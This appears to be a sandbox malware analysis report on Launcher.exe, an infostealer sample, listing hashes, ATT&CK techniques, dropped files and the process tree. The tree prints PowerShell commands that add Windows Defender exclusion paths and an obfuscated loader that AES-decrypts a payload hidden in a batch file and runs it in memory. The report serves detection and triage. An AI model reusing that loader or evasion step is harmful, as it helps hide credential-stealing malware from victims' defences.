8df009feace560a1ad2466d60cb90b5be793021b2fbb5af90a13645a137e317e

Analysis

max time kernel
62s
max time network
75s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
27/08/2023, 22:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Launcher.exe
Size

148.9MB
MD5

0413f927661212f44a19475d7110e97d
SHA1

3f4431b1e32995777a7d234a2e7604674d7763e0
SHA256

8df009feace560a1ad2466d60cb90b5be793021b2fbb5af90a13645a137e317e
SHA512

15e94706d36e419adefe51be8566d41e945d30e8fc89dbcc19d67da9efe823665b54064a8a246d8a61c5bf8760d196f00f46fe11f04c5e9992f9e8ac5cb89035
SSDEEP

786432:A5N1mgE/WgDe6UmdCvF4N3RtI9n1gqBf8IC3ZNXDPWsUwZnb5xFTtLwSTRpf4P1d:qSgU/UmamUyqt8yctjdqSjR2

Score

7^/10

spyware stealer

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3588	White.bat.exe
2636	Update.exe

Loads dropped DLL 3 IoCs

pid	Process
2540	Launcher.exe
2540	Launcher.exe
2540	Launcher.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2772	powershell.exe
2772	powershell.exe
3588	White.bat.exe
3588	White.bat.exe
4100	powershell.exe
4100	powershell.exe
3588	White.bat.exe
3588	White.bat.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2540	Launcher.exe
Token: SeDebugPrivilege	2772	powershell.exe
Token: SeDebugPrivilege	3588	White.bat.exe
Token: SeDebugPrivilege	4100	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 2540 wrote to memory of 2772	2540	Launcher.exe	91
PID 2540 wrote to memory of 2772	2540	Launcher.exe	91
PID 2540 wrote to memory of 3236	2540	Launcher.exe	94
PID 2540 wrote to memory of 3236	2540	Launcher.exe	94
PID 3236 wrote to memory of 3588	3236	cmd.exe	96
PID 3236 wrote to memory of 3588	3236	cmd.exe	96
PID 2540 wrote to memory of 4100	2540	Launcher.exe	97
PID 2540 wrote to memory of 4100	2540	Launcher.exe	97
PID 2540 wrote to memory of 2636	2540	Launcher.exe	101
PID 2540 wrote to memory of 2636	2540	Launcher.exe	101
PID 2540 wrote to memory of 2636	2540	Launcher.exe	101

C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2540
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\TempFolder
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\TempFolder\White.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3236
- - C:\Users\Admin\AppData\Roaming\TempFolder\White.bat.exe
    "White.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_BEfTf = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\TempFolder\White.bat').Split([Environment]::NewLine);foreach ($_CASH_cSMGB in $_CASH_BEfTf) { if ($_CASH_cSMGB.StartsWith(':: @')) { $_CASH_tiCLs = $_CASH_cSMGB.Substring(4); break; }; };$_CASH_tiCLs = [System.Text.RegularExpressions.Regex]::Replace($_CASH_tiCLs, '_CASH_', '');$_CASH_YOQbw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_tiCLs);$_CASH_IiqDP = New-Object System.Security.Cryptography.AesManaged;$_CASH_IiqDP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_IiqDP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_IiqDP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZGLYQpXzqZGio1AM3RKuGPD761wgVPaj/0ACagm3x4Q=');$_CASH_IiqDP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8fyzMDu1kB6HN1zdS5E5ew==');$_CASH_dmOzy = $_CASH_IiqDP.CreateDecryptor();$_CASH_YOQbw = $_CASH_dmOzy.TransformFinalBlock($_CASH_YOQbw, 0, $_CASH_YOQbw.Length);$_CASH_dmOzy.Dispose();$_CASH_IiqDP.Dispose();$_CASH_LIOIB = New-Object System.IO.MemoryStream(, $_CASH_YOQbw);$_CASH_Fjwxu = New-Object System.IO.MemoryStream;$_CASH_XnHig = New-Object System.IO.Compression.GZipStream($_CASH_LIOIB, [IO.Compression.CompressionMode]::Decompress);$_CASH_XnHig.CopyTo($_CASH_Fjwxu);$_CASH_XnHig.Dispose();$_CASH_LIOIB.Dispose();$_CASH_Fjwxu.Dispose();$_CASH_YOQbw = $_CASH_Fjwxu.ToArray();$_CASH_gCWCr = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_YOQbw);$_CASH_mvcbk = $_CASH_gCWCr.EntryPoint;$_CASH_mvcbk.Invoke($null, (, [string[]] ('')))
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3588
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4100
- C:\Users\Admin\AppData\Roaming\TempFolder\Update.exe
  "C:\Users\Admin\AppData\Roaming\TempFolder\Update.exe"
  2⤵
  - Executes dropped EXE
  PID:2636

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\5dea2948f6cf4de38bd10ef97654c5df /t 2704 /p 2540
1⤵
PID:4916

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
4KB

MD5
091e1bd1a14f0f1df7e6a8f7751cb347

SHA1
4e2fd1763b9f4d7f044667cefa7554bd04f7600e

SHA256
e0c657192c7add2a1d283f601ec5bc2ad15498feeb186ac8401c74068844128e

SHA512
e2b49b3dca589ffae922de96be76030c8ba974f1674fd826dd8142b1247a5e82878b3e76d1456454abc9824256f1a6b1faf63506047b4963a9135d2bf0f7a939

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Launcher\BzgCgbfZ7GWrOkrapwDvBXaeXpeaAAE=\D3DCompiler_47_cor3.dll

Filesize
4.7MB

MD5
2191e768cc2e19009dad20dc999135a3

SHA1
f49a46ba0e954e657aaed1c9019a53d194272b6a

SHA256
7353f25dc5cf84d09894e3e0461cef0e56799adbc617fce37620ca67240b547d

SHA512
5adcb00162f284c16ec78016d301fc11559dd0a781ffbeff822db22efbed168b11d7e5586ea82388e9503b0c7d3740cf2a08e243877f5319202491c8a641c970

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Launcher\BzgCgbfZ7GWrOkrapwDvBXaeXpeaAAE=\PresentationNative_cor3.dll

Filesize
1.2MB

MD5
c7bcc68b81e965fe74ef58d503c58deb

SHA1
99990f204f7318eeb8de6f9664ebcd0d42ea81b7

SHA256
06cb4da78f5cfddece86329241a2af9d6390ce1082b02f7db2e3bf320215a23e

SHA512
cab2bc27eca0ee097324a2471c8228f1723cfef5df9971359eec7710082c122b26a7aa1d1e6faab75389438a358bbff2973ad67e8dd9046455b4c4ac880d858c

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\Launcher\BzgCgbfZ7GWrOkrapwDvBXaeXpeaAAE=\wpfgfx_cor3.dll

Filesize
1.9MB

MD5
1b01746fe61beb761a643050823190b0

SHA1
927b12e4a733bcc51545c6a005838a24b8dc4dda

SHA256
f8c4d6eb1cfa9c5b6fb322a0c818a4f5d5ee44043c259e0262c0460513953fb8

SHA512
83eeb187e554588a5a4efbce0fcb7e9c30e718ec9f6d797a7add28036e3d4506cd3e78386522467d7ac967a60ac509a23edd79a1b9032a7e230d980b9f36080a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_scw5ujlr.1da.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\TempFolder\Update.exe

Filesize
2.4MB

MD5
06c8202d2099957c9306f015df5d0139

SHA1
4d59241817e25e858680f7658e5f5bb7fb74d8a3

SHA256
80bf899a2d9d24288525e8d41597efbb4612facc06f69910b9cfc1b285d44544

SHA512
9fb30ac11279cb2b5e4d50b0b998b2d04498758c8dc78ff8c12b0e907d24037aa0cc8a7ecf6416e858a9110441e4ce8661f2cda29508bf089871e9a07d8430be

Download Submit
C:\Users\Admin\AppData\Roaming\TempFolder\Update.exe

Filesize
2.4MB

MD5
06c8202d2099957c9306f015df5d0139

SHA1
4d59241817e25e858680f7658e5f5bb7fb74d8a3

SHA256
80bf899a2d9d24288525e8d41597efbb4612facc06f69910b9cfc1b285d44544

SHA512
9fb30ac11279cb2b5e4d50b0b998b2d04498758c8dc78ff8c12b0e907d24037aa0cc8a7ecf6416e858a9110441e4ce8661f2cda29508bf089871e9a07d8430be

Download Submit
C:\Users\Admin\AppData\Roaming\TempFolder\White.bat

Filesize
449KB

MD5
b06355cf59db16e77fa973f744f15cd0

SHA1
62ab10cdc8694d62c2347214ae32ecab473559db

SHA256
50d8918d86e0d6643ce087d1820060f9839be808692d6eb0085ab0806e9a7beb

SHA512
e1fdfa1f4da423c9f4e5b700dc4fa1815cefe8701629130e2bc19b75b30c27bedb1832edc9f64e809538a59cfa4256f5f5dfb220eb81e4a1cc371c0872939fc3

Download Submit
C:\Users\Admin\AppData\Roaming\TempFolder\White.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Roaming\TempFolder\White.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
memory/2540-57-0x000001C3704B0000-0x000001C3704C8000-memory.dmp

Filesize
96KB

Download
memory/2540-72-0x000001C370630000-0x000001C370677000-memory.dmp

Filesize
284KB

Download
memory/2540-39-0x000001C36FC60000-0x000001C36FC65000-memory.dmp

Filesize
20KB

Download
memory/2540-36-0x000001C36FC70000-0x000001C36FC7D000-memory.dmp

Filesize
52KB

Download
memory/2540-60-0x000001C3704D0000-0x000001C3704E2000-memory.dmp

Filesize
72KB

Download
memory/2540-5-0x0000000180000000-0x0000000180A25000-memory.dmp

Filesize
10.1MB

Download
memory/2540-54-0x000001C3705A0000-0x000001C3705E0000-memory.dmp

Filesize
256KB

Download
memory/2540-51-0x000001C370490000-0x000001C3704A6000-memory.dmp

Filesize
88KB

Download
memory/2540-66-0x000001C3706E0000-0x000001C3707D4000-memory.dmp

Filesize
976KB

Download
memory/2540-48-0x000001C370420000-0x000001C370439000-memory.dmp

Filesize
100KB

Download
memory/2540-69-0x000001C370040000-0x000001C370048000-memory.dmp

Filesize
32KB

Download
memory/2540-12-0x000001C370DB0000-0x000001C371D38000-memory.dmp

Filesize
15.5MB

Download
memory/2540-42-0x000001C370020000-0x000001C370033000-memory.dmp

Filesize
76KB

Download
memory/2540-33-0x000001C370520000-0x000001C37059F000-memory.dmp

Filesize
508KB

Download
memory/2540-161-0x00007FF631B60000-0x00007FF63248B000-memory.dmp

Filesize
9.2MB

Download
memory/2540-15-0x000001C370050000-0x000001C370278000-memory.dmp

Filesize
2.2MB

Download
memory/2540-30-0x000001C373750000-0x000001C373F92000-memory.dmp

Filesize
8.3MB

Download
memory/2540-10-0x00007FF631B60000-0x00007FF63248B000-memory.dmp

Filesize
9.2MB

Download
memory/2540-8-0x000001C36FD10000-0x000001C36FE1D000-memory.dmp

Filesize
1.1MB

Download
memory/2540-45-0x000001C36FCC0000-0x000001C36FCC7000-memory.dmp

Filesize
28KB

Download
memory/2540-18-0x000001C370280000-0x000001C3703DE000-memory.dmp

Filesize
1.4MB

Download
memory/2540-27-0x000001C3703E0000-0x000001C37041E000-memory.dmp

Filesize
248KB

Download
memory/2540-24-0x000001C370440000-0x000001C370484000-memory.dmp

Filesize
272KB

Download
memory/2540-21-0x000001C36FC80000-0x000001C36FCBC000-memory.dmp

Filesize
240KB

Download
memory/2636-251-0x00000000005B0000-0x0000000000828000-memory.dmp

Filesize
2.5MB

Download
memory/2636-252-0x00000000050C0000-0x000000000515C000-memory.dmp

Filesize
624KB

Download
memory/2636-253-0x0000000074600000-0x0000000074DB0000-memory.dmp

Filesize
7.7MB

Download
memory/2636-250-0x0000000074600000-0x0000000074DB0000-memory.dmp

Filesize
7.7MB

Download
memory/2772-177-0x00007FF8C0D70000-0x00007FF8C1831000-memory.dmp

Filesize
10.8MB

Download
memory/2772-174-0x000002E71F420000-0x000002E71F430000-memory.dmp

Filesize
64KB

Download
memory/2772-173-0x000002E71F420000-0x000002E71F430000-memory.dmp

Filesize
64KB

Download
memory/2772-172-0x00007FF8C0D70000-0x00007FF8C1831000-memory.dmp

Filesize
10.8MB

Download
memory/2772-167-0x000002E706F10000-0x000002E706F32000-memory.dmp

Filesize
136KB

Download
memory/3588-209-0x0000025FF3590000-0x0000025FF369A000-memory.dmp

Filesize
1.0MB

Download
memory/3588-234-0x0000025FF0B20000-0x0000025FF0B30000-memory.dmp

Filesize
64KB

Download
memory/3588-203-0x00007FF8C0D70000-0x00007FF8C1831000-memory.dmp

Filesize
10.8MB

Download
memory/3588-204-0x0000025FF0B20000-0x0000025FF0B30000-memory.dmp

Filesize
64KB

Download
memory/3588-205-0x0000025FF0B20000-0x0000025FF0B30000-memory.dmp

Filesize
64KB

Download
memory/3588-227-0x00007FF8CD5C0000-0x00007FF8CD5D9000-memory.dmp

Filesize
100KB

Download
memory/3588-229-0x0000025FF36A0000-0x0000025FF3716000-memory.dmp

Filesize
472KB

Download
memory/3588-230-0x0000025FF38F0000-0x0000025FF3AB2000-memory.dmp

Filesize
1.8MB

Download
memory/3588-231-0x0000025FF3FF0000-0x0000025FF4518000-memory.dmp

Filesize
5.2MB

Download
memory/3588-232-0x0000025FF3520000-0x0000025FF353E000-memory.dmp

Filesize
120KB

Download
memory/3588-233-0x00007FF8C0D70000-0x00007FF8C1831000-memory.dmp

Filesize
10.8MB

Download
memory/3588-207-0x0000025FF0B20000-0x0000025FF0B30000-memory.dmp

Filesize
64KB

Download
memory/3588-235-0x0000025FF0B20000-0x0000025FF0B30000-memory.dmp

Filesize
64KB

Download
memory/3588-236-0x0000025FF0B20000-0x0000025FF0B30000-memory.dmp

Filesize
64KB

Download
memory/3588-237-0x0000025FF3720000-0x0000025FF3770000-memory.dmp

Filesize
320KB

Download
memory/3588-210-0x0000025FF3400000-0x0000025FF3412000-memory.dmp

Filesize
72KB

Download
memory/3588-241-0x00007FF8CD5C0000-0x00007FF8CD5D9000-memory.dmp

Filesize
100KB

Download
memory/3588-242-0x00007FF8C0D70000-0x00007FF8C1831000-memory.dmp

Filesize
10.8MB

Download
memory/3588-211-0x0000025FF34C0000-0x0000025FF34FC000-memory.dmp

Filesize
240KB

Download
memory/4100-222-0x00007FF8C0D70000-0x00007FF8C1831000-memory.dmp

Filesize
10.8MB

Download
memory/4100-224-0x0000021733720000-0x0000021733730000-memory.dmp

Filesize
64KB

Download
memory/4100-228-0x00007FF8C0D70000-0x00007FF8C1831000-memory.dmp

Filesize
10.8MB

Download
memory/4100-225-0x0000021733720000-0x0000021733730000-memory.dmp

Filesize
64KB

Download
memory/4100-223-0x0000021733720000-0x0000021733730000-memory.dmp

Filesize
64KB

Download